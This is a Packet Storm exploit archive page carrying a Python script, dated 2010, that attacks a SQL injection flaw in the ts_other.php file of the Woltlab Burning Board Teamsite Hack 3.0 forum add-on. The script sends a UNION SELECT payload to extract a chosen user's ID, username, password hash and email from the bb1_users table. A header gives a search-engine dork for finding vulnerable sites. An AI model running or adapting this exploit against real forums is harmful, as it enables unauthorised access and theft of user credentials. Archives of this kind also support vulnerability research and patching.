what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Woltlab Burning Board Teamsite Hack 3.0 SQL Injection

Woltlab Burning Board Teamsite Hack 3.0 SQL Injection
Posted Mar 22, 2010
Authored by Easy Laster

Woltlab Burning Board Teamsite Hack version 3.0 remote SQL injection exploit that leverages ts_other.php.

tags | exploit, remote, php, sql injection
SHA-256 | 19cff7126195b799e3b76c61b3fb00db28e23124673463b39720e1385a4fe68f

Woltlab Burning Board Teamsite Hack 3.0 SQL Injection

Change Mirror Download
----------------------------Information-----------------------------------------------------
+Name : Woltlab Burning Board Teamsite Hack V3.0 ts_other.php SQL Injection Exploit (Python)
+Autor : Easy Laster
+Date : 21.03.2010
+Script : Woltlab Burning Board Teamsite Hack V3.0
+Google Door : Teamsite Hack V3.0 by Blue -- Robis-Forum
+Download : http://www.robertotto.de/
+Demo : http://www.poldis-spielewelt.de/wbb2/
+Price : Woltlab Burning Board Lizenz
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------------

___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
|___| |___|


---------------------------------------------------------------------------------------------
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys, urllib2, re

if len(sys.argv) < 2:
print "***************************************************************"
print "*****Woltlab Board Burning Board Teamsite Hack V2.0 ***********"
print "***************************************************************"
print "* Discovered and vulnerability by Easy Laster *"
print "* coded by Dr.ChAoS *"
print "* *"
print "* <=Usage=> *"
print "* python exploit.py http://site.de/forum/ <userid, default=1> *"
print "* *"
print "***************************************************************"
exit()

if len(sys.argv) < 3:
id = 1
else:
id = sys.argv[2]

forum = sys.argv[1]
if forum[-1:] != "/":
forum += "/"

urlPart1 = forum + "ts_other.php?action=modboard&userid=1111111'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat(userid,0x3a,username,0x3a,password,0x3a,email),24,23,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55"
urlPart2 = "+from+bb1_users+where+userid=" + str(id) + "--+"
columns = ""

print "Exploiting..."

for i in range(10):
html = urllib2.urlopen(urlPart1 + columns + urlPart2).read()
##I hate regex!
res = re.findall(r">([1-9])\:(.*)\:(.*)<", html)
if len(res) > 0:
userID = res[0][0]
userData = res[0][1].rsplit(":", 1)
email = res[0][2].split("<")[0]
print "Success!\n"
print "ID: " + str(userID)
print "Username: " + userData[0]
print "Password: " + userData[1]
print "E-Mail: " + str(email)
print "\nHave a nice day!"
exit()
columns += ",1"

print "Exploit failed..."

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close